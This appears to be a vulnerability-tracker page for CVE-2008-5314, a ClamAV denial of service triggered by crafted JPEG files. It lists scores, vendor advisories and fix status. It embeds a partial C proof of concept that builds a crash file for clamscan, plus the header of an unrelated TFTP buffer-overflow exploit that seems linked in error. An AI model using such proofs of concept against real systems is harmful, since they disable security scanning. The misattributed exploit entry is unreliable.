CVE-2008-5314
Published 2008-12-03
CVE-2008-5314: Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a…
Priority P422 · medium · CVSS 2.0: 4.3
Vector: AV:N/AC:M/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 8.20% (94.2th percentile)
Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 allows remote attackers to cause a denial of service (daemon crash) via a crafted JPEG file, related to the cli_check_jpeg_exploit, jpeg_check_photoshop, and jpeg_check_photoshop_8bim functions.
Affected
46 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clam_anti-virus | clamav | <= 0.94.1 | — |
CVSS provenance
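| Source | CVSS version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 4.3 | MEDIUM | AV:N/AC:M/Au:N/C:N/I:N/A:P |
| osv | — | 4.3 | MEDIUM | — |
| vendor_debian | — | 4.3 | MEDIUM | — |
| vendor_redhat | — | 4.3 | MEDIUM | — |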
GHSA
GHSA-73rj-52cv-hrpx: Stack consumption vulnerability in libclamav/special
ghsa_unreviewed·2022-05-17
OSV
CVE-2008-5314: Stack consumption vulnerability in libclamav/special
osv·2008-12-03·CVSS 4.3
Ubuntu
ClamAV vulnerability
vendor_ubuntu·2008-12-02
Ilja van Sprundel discovered that ClamAV did not handle recursive JPEG
information. If a remote attacker sent a specially crafted JPEG file,
ClamAV would crash, leading to a denial of service.
Instructions: In general, a standard system upgrade is sufficient to effect the
necessary changes.
Red Hat
clamav: DoS / crash via crafted jpeg image
vendor_redhat·2008-12-01·CVSS 4.3
Debian
CVE-2008-5314: clamav - Stack consumption vulnerability in libclamav/special.c in ClamAV before 0.94.2 a...
vendor_debian·2008·CVSS 4.3
Scope: local
bookworm: resolved (fixed in 0.94.dfsg.2-1)
bullseye: resolved (fixed in 0.94.dfsg.2-1)
forky: resolved (fixed in 0.94.dfsg.2-1)
sid: resolved (fixed in 0.94.dfsg.2-1)
trixie: resolved (fixed in 0.94.dfsg.2-1)
No detection rules found.
Exploit-DB
TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow
exploitdb·2012-01-10
CVE-2008-1611 TFTP Server 1.4 - ST 'RRQ' Remote Buffer Overflow
```python
#!/usr/bin/python
#---------------------------------------------------------------------------#
# Exploit: TFTP SERVER V1.4 ST (RRQ Overflow) #
# OS: Windows XP PRO SP3 #
# Author: b33f #
#---------------------------------------------------------------------------#
# Smashing the stack for fun and practise... #
# #
# This tftp service have been pwned extensively: #
# (1) Muts ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/5314/ #
# (2) Molotov ==> WRQ Overflow #
# http://www.exploit-db.com/exploits/10542/ #
# (3) tixxDZ ==> ERROR Overflow #
# http://www.exploit-db.com/exploits/5563/ #
# #
#---------------------------------------------------------------------------#
# After some simple fuzzing with spike I discovered that sen
```
Exploit-DB
ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)
exploitdb·2008-12-03
CVE-2008-5314 ClamAV < 0.94.2 - JPEG Parsing Recursive Stack Overflow (PoC)
```c
#include <stdio.h>
#include <stdlib.h>

/* The definition of crashstr is not present on this page. */

#define NR_ITER 200000

int main() {
    FILE *fp;
    int i;

    fp = fopen("clamav-jpeg-crash.jpg", "w+");
    if (!fp) {
        printf("can't open/create file\n");
        exit(0);
    }
    /* Write the same byte sequence NR_ITER times back to back. */
    for (i = 0; i < NR_ITER; i++) {
        fwrite(crashstr, sizeof(crashstr)-1/*don't want 0-byte ?*/, 1,
               fp);
    }
    fclose(fp);
    printf("done, now run clamscan on ./clamav-jpeg-crash.jpg\n");
    exit(0);
}
/*
result:
ilja@opensolaris:~$ ./jpg
done, now run clamscan on ./clamav-jpeg-crash.jpg
ilja@opensolaris:~$ /usr/local/bin/clamscan ./clamav-jpeg-crash.jpg
LibClamAV Warning: **************************************************
LibClamAV Warning: *** The virus database is older than 7 days! ***
LibClamAV Warning: *** Please update it as soon as possible. ***
LibClamAV Warning: **************************************************
Se
```
http://lists.apple.com/archives/security-announce/2009/Feb/msg00000.html
http://lists.opensuse.org/opensuse-security-announce/2008-12/msg00003.html
http://lurker.clamav.net/message/20081126.150241.55b1e092.en.html
http://osvdb.org/50363
http://secunia.com/advisories/32926
http://secunia.com/advisories/32936
http://secunia.com/advisories/33016
http://secunia.com/advisories/33195
http://secunia.com/advisories/33317
http://secunia.com/advisories/33937
http://security.gentoo.org/glsa/glsa-200812-21.xml
http://sourceforge.net/project/shownotes.php?group_id=86638&release_id=643134
http://support.apple.com/kb/HT3438
http://www.debian.org/security/2008/dsa-1680
http://www.mandriva.com/security/advisories?name=MDVSA-2008:239
http://www.openwall.com/lists/oss-security/2008/12/01/8
http://www.securityfocus.com/bid/32555
http://www.securitytracker.com/id?1021296
http://www.ubuntu.com/usn/usn-684-1
http://www.vupen.com/english/advisories/2008/3311
http://www.vupen.com/english/advisories/2009/0422
https://exchange.xforce.ibmcloud.com/vulnerabilities/46985
https://www.exploit-db.com/exploits/7330
https://wwws.clamav.net/bugzilla/show_bug.cgi?id=1266